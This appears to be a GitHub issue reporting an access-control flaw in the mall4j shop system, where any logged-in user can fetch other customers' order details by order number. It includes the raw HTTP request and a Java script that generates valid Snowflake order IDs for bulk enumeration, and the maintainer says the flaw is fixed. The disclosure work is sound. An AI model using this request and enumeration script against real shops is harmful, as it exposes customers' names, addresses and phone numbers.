search

gz-yami / mall4j

⭐️⭐️⭐️ 电商商城 小程序电商商城系统 PC商城 H5商城 APP商城 Java商城 O2O商城 跨境商城
https://www.mall4j.com
GNU Affero General Public License v3.0
4.79k stars 1.29k forks source link

There is a insecure permission vulnerability that can lead to information Disclosure #13

Closed swee520 closed 1 year ago

swee520 commented 2 years ago

After the user logged in, send the following data: GET /p/order/getOrderPayInfoByOrderNumber?orderNumbers=1585796527123730432 HTTP/2 Host: b2b2c-api.mall4j.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: application/json, text/plain, */* Accept-Language: zh Accept-Encoding: gzip, deflate Authorization: iqype7HZzm8WwlUnYTIRmXVBsfZ2Udqs+7wO+RAQLOB61CG1vjV6U+sArYkZPG8Q Origin: https://pc.mall4j.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers Connection: close The user can input others orderNumbers to gain other Privacy Information including address,name,phonenumber and so on. I write a script can get orderNumbers,attacker can get order's information that was created in any day.

Script: ` import cn.hutool.core.date.SystemClock; import cn.hutool.core.util.IdUtil; import cn.hutool.core.util.StrUtil;

import java.io.*; import java.util.Date;

public class test implements Serializable { public static void main(String[] args) throws IOException { FileWriter f = new FileWriter("/mall4j-master/1.txt"); FileOutputStream out = null; for (long i = 1666884749000l; i <= 1666884750000l; i++) { for (long j = 31l; j <= 31l; j++) { test test1 = new test(1,1); // out = new FileOutputStream(new File("/Users/zhangchenxu/安全/代码审计靶场/mall4j-master/1.txt"));

            String str = String.valueOf(test1.nextId(i));
            System.out.println(str);
            f.write(str + "\n");
        }
    }

  //  System.out.println(test1.nextId(1666885538000l));

    f.close();

}
private static final long serialVersionUID = 1L;

public static long DEFAULT_TWEPOCH = 1288834974657L;

public static long DEFAULT_TIME_OFFSET = 2000L;

private static final long WORKER_ID_BITS = 5L;

private static final long MAX_WORKER_ID = -1L ^ (-1L << WORKER_ID_BITS);
private static final long DATA_CENTER_ID_BITS = 5L;

private static final long MAX_DATA_CENTER_ID = -1L ^ (-1L << DATA_CENTER_ID_BITS);

private static final long SEQUENCE_BITS = 12L;

private static final long WORKER_ID_SHIFT = SEQUENCE_BITS;

private static final long DATA_CENTER_ID_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS;

private static final long TIMESTAMP_LEFT_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS + DATA_CENTER_ID_BITS;

private static final long SEQUENCE_MASK = ~(-1L << SEQUENCE_BITS);// 4095

private  long twepoch;
private  long workerId;
private  long dataCenterId;
private  boolean useSystemClock;

private  long timeOffset;

private long sequence = 0L;
private long lastTimestamp = -1L;

public test() {
    this(IdUtil.getWorkerId(IdUtil.getDataCenterId(MAX_DATA_CENTER_ID), MAX_WORKER_ID));
}

public test(long workerId) {
    this(workerId, IdUtil.getDataCenterId(MAX_DATA_CENTER_ID));
}

public test(long workerId, long dataCenterId) {
    this(workerId, dataCenterId, false);
}

public test(long workerId, long dataCenterId, boolean isUseSystemClock) {
    this(null, workerId, dataCenterId, isUseSystemClock);
}

public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock) {
    this(epochDate, workerId, dataCenterId, isUseSystemClock, DEFAULT_TIME_OFFSET);
}

public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock, long timeOffset) {
    if (null != epochDate) {
        this.twepoch = epochDate.getTime();
        System.out.println("null != epochDate");
    } else{
        // Thu, 04 Nov 2010 01:42:54 GMT
        this.twepoch = DEFAULT_TWEPOCH;
    }
    if (workerId > MAX_WORKER_ID || workerId < 0) {
        throw new IllegalArgumentException(StrUtil.format("worker Id can't be greater than {} or less than 0", MAX_WORKER_ID));
    }
    if (dataCenterId > MAX_DATA_CENTER_ID || dataCenterId < 0) {
        throw new IllegalArgumentException(StrUtil.format("datacenter Id can't be greater than {} or less than 0", MAX_DATA_CENTER_ID));
    }
    this.workerId = workerId;
    this.dataCenterId = dataCenterId;
    this.useSystemClock = isUseSystemClock;
    this.timeOffset = timeOffset;
}

public long getWorkerId(long id) {
    return id >> WORKER_ID_SHIFT & ~(-1L << WORKER_ID_BITS);
}

public long getDataCenterId(long id) {
    return id >> DATA_CENTER_ID_SHIFT & ~(-1L << DATA_CENTER_ID_BITS);
}

public long getGenerateDateTime(long id) {
    return (id >> TIMESTAMP_LEFT_SHIFT & ~(-1L << 41L)) + twepoch;
}

public synchronized long nextId(long time0) {

    long timestamp = time0;
    if (timestamp < this.lastTimestamp) {
        if(this.lastTimestamp - timestamp < timeOffset){
            // 容忍指定的回拨,避免NTP校时造成的异常
            timestamp = lastTimestamp;
        } else{
            // 如果服务器时间有问题(时钟后退) 报错。
            throw new IllegalStateException(StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
        }
    }

    if (timestamp == this.lastTimestamp) {
        final long sequence = (this.sequence + 1) & SEQUENCE_MASK;
        if (sequence == 0) {
            timestamp = tilNextMillis(lastTimestamp,time0);
        }
        this.sequence = sequence;
    } else {
        sequence = 0L;
    }

    lastTimestamp = timestamp;

    long result = ((timestamp - twepoch) << TIMESTAMP_LEFT_SHIFT)
            | (dataCenterId << DATA_CENTER_ID_SHIFT)
            | (workerId << WORKER_ID_SHIFT)
            | sequence;

    return result;
}

public String nextIdStr() {
   // return Long.toString(nextId());
    return null;
}

// ------------------------------------------------------------------------------------------------------------------------------------ Private method start

private long tilNextMillis(long lastTimestamp,long time0) {
    long timestamp = time0;

    while (timestamp == lastTimestamp) {
        timestamp = time0;
    }
    if (timestamp < lastTimestamp) {
        // 如果发现新的时间戳比上次记录的时间戳数值小,说明操作系统时间发生了倒退,报错
        throw new IllegalStateException(
                StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
    }
    return timestamp;
}

private long genTime() {
    return this.useSystemClock ? SystemClock.now() : System.currentTimeMillis();
}
// ------------------------------------------------------------------------------------------------------------------------------------ Private method end

} `

gz-yami commented 1 year ago

Thank you for your report. We have fixed this problem